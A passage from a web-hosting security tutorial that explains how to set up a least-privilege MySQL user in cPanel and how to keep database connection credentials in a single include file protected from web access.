  5. Go to the Add Users To Your Databases section.
  6. In the left dropdown box, select the user you just created.
  7. In the right dropdown box, select the database you want that user to be able to connect to.
  8. Select the Privileges you want that user to have for that database, by checking the appropriate boxes. Select only the privileges the user really needs for performing whatever tasks your scripts will do. Granting only limited privileges is a security precaution.
  9. Click Add User To Database. Your new user now has the specified privileges, for that database only. Add the user to other databases, if needed.
Now update your scripts so they use the connection data for this new user instead of your old cPanel user. However, ...

b) Put your MySQL connection data in a well protected file

If each of your scripts has its own code block for database connection, then if you are hacked and have to change your passwords, you'll have to hunt through all your files to find every code block that needs changing.
Instead, put all your database connection code in one central location such as an include file that is well-protected from web access, and make all your scripts read it from there. There are examples and some discussion about how to do this in the User Contributed Notes at http://us.php.net/mysql_connect. You can protect your include file by putting it in a folder above public_html, or in any folder that is closed to web access by an .htaccess file, or by the other methods mentioned in the php.net Notes.
Unfortunately, none of these protection methods will keep your data safe from someone who has actually gotten into your site, but the new database connection method you have just created will make it easy to change your password (in just one place) if that does happen.